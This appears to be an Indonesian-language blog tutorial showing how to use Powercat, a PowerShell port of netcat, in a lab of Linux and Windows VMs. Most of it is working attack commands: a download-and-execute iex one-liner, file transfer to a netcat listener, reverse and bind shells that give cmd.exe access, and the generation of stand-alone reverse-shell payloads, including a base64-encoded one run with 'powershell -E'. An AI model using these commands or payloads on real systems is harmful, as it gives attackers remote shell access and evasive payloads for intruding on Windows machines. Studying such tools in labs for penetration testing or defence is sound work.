Powercat : Netcatnya Powershell Windows, Bisa bikin stand-alone payloadnya juga

Powercat

Powercat adalah versi powershellnya netcat yang ditulis oleh besimorhino gampangnya, powershell ini netcat tapi ditulis dalam versi powershell. Buat kalian yang belum tau apa itu netcat, bisa cek disini.

Disini saya punya 3 VM, 2 Windows dan 1 Linux.

Install Powercat

Jalankan di Linux :

apt install powercat

cd /usr/share/windows-resources/powercat

python -m SimpleHTTPServer

Jalankan di Windows :

powershell -c "(new-object System.Net.WebClient).DownloadFile('http://192.168.56.22:8000/powercat.ps1','powercat.ps1')"

. .\powercat.ps1

atau kalau kalian punya koneksi internet, kalian bisa langsung install dengan command :

iex (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1')

Run Powercat

PS C:\Users\fitrah.sofyan> powercat

You must select either client mode (-c) or listen mode (-l).

Transfer file

Sama kaya netcat, powercat juga bisa kirim dan terima file.

Kirim File

Jalankan di Linux :

$ sudo nc -nlvp 443 > from_windows_powercat.ps1

Jalankan di Windows 10 :

powercat -c 10.20.20.204 -p 443 -i powercat.ps1

Terima File

Jalankan di Linux :

$ sudo nc -nlvp 443 < from_windows_powercat.ps1

Jalankan di Windows :

powercat -c 10.20.20.204 -p 443 -of .\from-linux-powercat.ps1

ls .\from-linux-powercat.ps1                                                                 

    Directory: C:\Users\fitrah.sofyan

Mode                LastWriteTime         Length Name

----                -------------         ------ ----

-a----       08/09/2020     14.55          37641 from-linux-powercat.ps1

Powercat Reverse Shell

Reverse shell ini sebuah metode untuk mendapatkan shell dari powercat yang berjalan sebagai client. Jadi, kita harus jalankan dulu listenernya.

Berikut ini cara reverse shell dengan powercat. Oiya untuk listenernya saya pake netcat yang dijalankan di linux

Eksekusi di Linux :

sudo nc -nlvp 443

Eksekusi di Windows :

powercat -c 10.20.20.204 -p 443 -e cmd.exe

Powercat Bind Shell

Bind shell ini gunanya si listener mengirimkan shellnya (dibinding). Jadi powercat berjalan sebagai listener dan melakukan binding terhadap shellnya. Jadi si client tinggal konek aja ke listenernya, nanti otomatis dapet shellnya si listener.

Eksekusi di Windows 10 : 

powercat -l -p 443 -e cmd.exe

Eksekusi di Linux : 

nc -nv 10.20.20.2 443

(UNKNOWN) [10.20.20.2] 443 (https) open

Microsoft Windows [Version 10.0.18363.720]

(c) 2019 Microsoft Corporation. All rights reserved.

C:\Users\fitrah.sofyan> 

Powercat Stand Alone Payloads

Jalankan dulu netcat listener di Linux :

$ netcat -lnvp 443

Jalankan di windows :

powercat -c 10.20.20.204 -p 443 -e cmd.exe -g > reverseshell.ps1

./reverseshell.ps1

Cek kembali netcat di linux

dengan opsi ini, payload yang dibuat tidak diencoding jadi terlihat scriptnya,

agar payload ini diencoding, diubah opsi -g menjadi -ge

powercat -c 10.20.20.204 -p 443 -e cmd.exe -ge > encodedreverseshell.ps1 

kemudian ketika menjalankannya pun berbeda, yaitu dengan menggunakan command powershell -E dan diikuti isi filenya.

buka file encodedreverseshell.ps1 dan copy semua isi filenya, kemudian jalankan powershell -E isifile

powershell -E ZgB1AG4AYwB0AGkAbwBuACAAUwB0AHIAZQBhAG0AMQBfAFMAZQB0AHUAcAAKAHsACgA......

kemudian cek kembali netcat di linux

Sekian, Hatur Nuhun

loading...